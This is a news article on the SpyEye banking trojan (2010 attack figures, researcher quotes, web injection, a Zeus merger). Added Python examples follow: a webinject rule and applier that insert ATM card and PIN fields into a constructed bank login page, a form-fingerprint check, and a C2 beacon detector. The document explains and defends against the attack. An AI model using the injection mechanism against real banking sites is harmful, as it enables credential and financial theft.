SpyEye trojan attacks surged in July, August, and September, reaching between 35 and 45 attacks each month. Over the entire period measured by Damballa, from January to October 2010, there were 190 known attacks.
Almost 30% of the trojan's attacks came from Ukraine, with the Czech Republic ranking second with 12% and the US third with 8%.
In just one case, 28,590 computers were infected with the SpyEye trojan over a 25-day period. “SpyEye is an up-and-coming piece of malware over the past year, heavily competing with Zeus. It is quite effective and cheaper,” said James in an interview with Infosecurity. In fact, SpyEye costs only $500, a bargain for penny-pinching criminals.
SpyEye has similar capabilities to the Zeus trojan. Once the SpyEye trojan gains access to a computer, it can download files, modify system processes, log user keystrokes, and build a botnet. It even claims to have the capability to “kill Zeus”. If the Zeus trojan is already running on the system, SpyEye takes over the process and steals the traffic that Zeus would have stolen, James explained.
SpyEye has a web injection capability: when a victim visits his or her bank's website, the trojan rewrites the page inside the browser and adds form fields the bank never asked for, so the attackers can harvest ATM and credit card numbers along with the login. Hackers can do “local phishing on the fly by adding in entries that they might want to obtain”, James said. SpyEye also lets the attacker alter the details of a money transfer the victim is making, so that the funds go to an account the attacker controls rather than to the intended recipient.
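The mechanism behind "local phishing on the fly" is a rule that tells the bot where in the bank's HTML to splice extra fields. The following is an added illustration, not SpyEye's own code or configuration: it uses the keyword layout of the widely documented Zeus webinjects format (set_url / data_before / data_inject / data_after / data_end), which SpyEye kits also consumed, applies one constructed rule to a constructed login page, and then shows the defender-side counterpart, a fingerprint of the form's field names that reveals the injected inputs. The bank name, URL, field names and the exact replace-between-anchors semantics are assumptions made for the example.

```python
import hashlib
import re

# Constructed webinject rule (assumed format and semantics; not copied from any
# real SpyEye or Zeus configuration). '*' is a wildcard inside the anchors.
WEBINJECT_RULE = """\
set_url https://bank.example/login* GP
data_before
name="password"*</label>
data_end
data_inject
<label>ATM card number <input type="text" name="atm_card"></label>
<label>ATM PIN <input type="password" name="atm_pin"></label>
data_end
data_after
<input type="submit"
data_end
"""

# Constructed login page, as the bank's server would send it.
ORIGINAL_PAGE = """\
<html><body>
<form action="/login" method="post">
<label>User ID <input type="text" name="userid"></label>
<label>Password <input type="password" name="password"></label>
<input type="submit" value="Sign in">
</form>
</body></html>
"""


def wildcard_to_regex(pattern):
    """'*' means 'match anything (shortest)'; every other character is literal."""
    return ".*?".join(re.escape(part) for part in pattern.split("*"))


def parse_webinjects(text):
    """Parse rule text into dicts with keys url, flags, before, inject, after."""
    rules, current, section, buf = [], None, None, []
    for line in text.splitlines():
        if line.startswith("set_url "):
            parts = line.split()
            current = {"url": parts[1], "flags": parts[2] if len(parts) > 2 else "",
                       "before": "", "inject": "", "after": ""}
            rules.append(current)
        elif line in ("data_before", "data_inject", "data_after"):
            section, buf = line[len("data_"):], []
        elif line == "data_end":
            if current is not None and section is not None:
                current[section] = "\n".join(buf)
            section = None
        elif section is not None:
            buf.append(line)
    return rules


def apply_webinject(rule, url, html):
    """Rewrite the page the way a man-in-the-browser bot does: if the URL matches,
    everything between the data_before and data_after anchors is replaced by
    data_inject. Returns the page unchanged when URL or anchors do not match."""
    if not re.fullmatch(wildcard_to_regex(rule["url"]), url):
        return html
    before = re.search(wildcard_to_regex(rule["before"]), html, re.S)
    if not before:
        return html
    after = re.search(wildcard_to_regex(rule["after"]), html[before.end():], re.S)
    if not after:
        return html
    start, end = before.end(), before.end() + after.start()
    return html[:start] + "\n" + rule["inject"] + "\n" + html[end:]


# Defender side: the bank knows which input names its login form carries.
FIELD_RE = re.compile(r'<input[^>]*\sname="([^"]+)"')


def form_fields(html):
    """Sorted list of input field names present in the page."""
    return sorted(FIELD_RE.findall(html))


def fingerprint(html):
    """SHA-256 over the sorted field names; compare against the known-good value
    (e.g. in a page-integrity script or when a POST arrives with extra fields)."""
    return hashlib.sha256(",".join(form_fields(html)).encode()).hexdigest()


def injected_fields(expected_html, observed_html):
    """Field names that appear in the observed page but not in the expected one."""
    return sorted(set(form_fields(observed_html)) - set(form_fields(expected_html)))


if __name__ == "__main__":
    rule = parse_webinjects(WEBINJECT_RULE)[0]
    tampered = apply_webinject(rule, "https://bank.example/login?lang=en", ORIGINAL_PAGE)
    print(tampered)
    print("fingerprint unchanged:", fingerprint(ORIGINAL_PAGE) == fingerprint(tampered))
    print("injected fields:", injected_fields(ORIGINAL_PAGE, tampered))
```

The server never sees a different URL or a different TLS session, which is why the bank cannot tell the injected page from its own; the only reliable tell is the extra `atm_card` and `atm_pin` parameters arriving in the POST, or a fingerprint mismatch computed in the browser before the bot's hook has a chance to lie about it.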
The trojan mutates its binaries so that it keeps evading anti-virus signatures even as those signatures are updated, he said. SpyEye's operators are in a constant race with the anti-virus software companies.
James said that SpyEye has a plug-in specifically for Bank of America so that it can defeat the site password and site key features. “When you go to a Bank of America account, it will have a login and a site key image… [SpyEye] has the ability to steal the user name, password, and site key information. Once users go in, if they are doing any kind of money transfers, there is a feature called site pass, which is a two-factor authentication system. SpyEye can report that in real-time to the operators so that if they want to log into the Bank of America account while money is being transferred, they can do that.”
In an Aug. 25 blog post, James wrote about some of the characteristics of the SpyEye trojan. In a follow-up article, made available to Infosecurity but not yet posted on the Damballa blog, James detailed the traffic characteristics of SpyEye.
“Traffic analysis for SpyEye reveals particular information about the specific exploits incurred by the botnet operators as well as their specific motives. Acquiring intelligence early on about an increasing threat such as SpyEye is essential in order to gain an upper hand against such malice. Performing traffic analysis is an effective method to obtain information about the intentions and actions of an enemy, in this case, an operator of SpyEye utilizing the tool to steal credentials and financial information from unsuspecting computer users,” James wrote.
Since January 2010 there have been 173 unique SpyEye domains discovered in the wild and 17 IP addresses hosted on 77 unique ISPs in 24 countries. “Many have had a decent life-cycle and have demonstrated gradual growth over time in use,” he said.
“What is apparent is that the summer months have seen significant growth for SpyEye activity and it's predicted that the growth will maintain since it's a low-cost and effective do-it-yourself trojan kit with many features. With over 190 known unique SpyEye assaults over an eight-month period, it can be suggested that this specific malicious software is growing in popularity and will likely continue to do so,” he wrote.
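The kind of traffic analysis James describes, counting victims per command-and-control domain and watching how each domain's use grows, rests on a simple observation: infected machines check in with their controller on a schedule, while ordinary browsing does not. The following is an added example of that analysis, not Damballa's tooling or SpyEye's actual network signature (the page gives no SpyEye URLs or hosts, and none are claimed here). It parses constructed proxy log lines, measures the regularity of each client's contacts with each destination, and flags destinations that several clients beacon to at a steady interval. The host names, addresses, paths and thresholds are all invented for the illustration.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log lines: "<ISO timestamp> <client IP> <destination host> <path>".
# Three clients contact c2-panel.example every 300 s; two others browse news.example
# at irregular times. All values are invented, none are real SpyEye indicators.
LOG_LINES = [
    "2010-08-03T10:00:00 10.0.0.11 c2-panel.example /check.php",
    "2010-08-03T10:00:05 10.0.0.20 news.example /index.html",
    "2010-08-03T10:00:40 10.0.0.20 news.example /story/1",
    "2010-08-03T10:01:10 10.0.0.12 c2-panel.example /check.php",
    "2010-08-03T10:02:30 10.0.0.13 c2-panel.example /check.php",
    "2010-08-03T10:03:12 10.0.0.20 news.example /story/2",
    "2010-08-03T10:04:00 10.0.0.21 news.example /index.html",
    "2010-08-03T10:05:00 10.0.0.11 c2-panel.example /check.php",
    "2010-08-03T10:06:10 10.0.0.12 c2-panel.example /check.php",
    "2010-08-03T10:07:30 10.0.0.13 c2-panel.example /check.php",
    "2010-08-03T10:09:50 10.0.0.20 news.example /story/3",
    "2010-08-03T10:10:00 10.0.0.11 c2-panel.example /check.php",
    "2010-08-03T10:11:10 10.0.0.12 c2-panel.example /check.php",
    "2010-08-03T10:12:30 10.0.0.13 c2-panel.example /check.php",
    "2010-08-03T10:15:00 10.0.0.11 c2-panel.example /check.php",
    "2010-08-03T10:15:33 10.0.0.21 news.example /story/4",
    "2010-08-03T10:16:01 10.0.0.21 news.example /story/5",
    "2010-08-03T10:16:10 10.0.0.12 c2-panel.example /check.php",
    "2010-08-03T10:17:30 10.0.0.13 c2-panel.example /check.php",
    "2010-08-03T10:18:45 10.0.0.12 news.example /index.html",
    "2010-08-03T10:20:00 10.0.0.11 c2-panel.example /check.php",
    "2010-08-03T10:21:10 10.0.0.12 c2-panel.example /check.php",
    "2010-08-03T10:22:30 10.0.0.13 c2-panel.example /check.php",
]


def parse_log(lines):
    """Group contact timestamps as host -> client -> [datetime, ...]."""
    events = defaultdict(lambda: defaultdict(list))
    for line in lines:
        ts, client, host, _path = line.split()
        events[host][client].append(datetime.fromisoformat(ts))
    return events


def beacon_profile(timestamps):
    """(median gap in seconds, jitter ratio) for one client/host pair, or None when
    there are too few contacts to judge. Jitter is the standard deviation of the
    gaps divided by their median: near 0 for a timer-driven bot, large for a human."""
    ts = sorted(timestamps)
    if len(ts) < 3:
        return None
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    median_gap = statistics.median(gaps)
    jitter = statistics.pstdev(gaps) / median_gap if median_gap else float("inf")
    return median_gap, jitter


def summarize(events, max_jitter=0.2, min_victims=2):
    """Per destination host: how many distinct clients contacted it, how many of them
    did so at a regular interval, and whether that is enough to suspect a C2."""
    report = {}
    for host, clients in events.items():
        regular = {}
        for client, ts in clients.items():
            profile = beacon_profile(ts)
            if profile and profile[1] <= max_jitter:
                regular[client] = profile[0]
        report[host] = {
            "unique_clients": len(clients),
            "regular_beaconers": len(regular),
            "median_interval": statistics.median(regular.values()) if regular else None,
            "suspected_c2": len(regular) >= min_victims,
        }
    return report


if __name__ == "__main__":
    for host, row in summarize(parse_log(LOG_LINES)).items():
        print(host, row)
```

Run over a day of real proxy logs, the per-host client count is the "28,590 computers" figure for one domain, and tracking that count across days is the "gradual growth over time" James refers to. The jitter threshold is the knob that matters: kits that randomize their check-in delay push the ratio up, so in practice the value is tuned against known-bad traffic rather than fixed at 0.2.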
James cited a blog post by Brian Krebs indicating that SpyEye and Zeus were considering merging.
“Leading malware developers within the cyber crime community have conspired to terminate development of the infamous ZeuS banking trojan and to merge its code base with that of the up-and-coming SpyEye trojan, new evidence suggests. The move appears to be aimed at building a superior e-banking threat whose sale is restricted to a more exclusive and well-heeled breed of cyber crook”, Krebs wrote.
So it looks like the rules of the market economy operate in the criminal underground as well. Perhaps a catchy name for the merged trojan would be ZeusEye.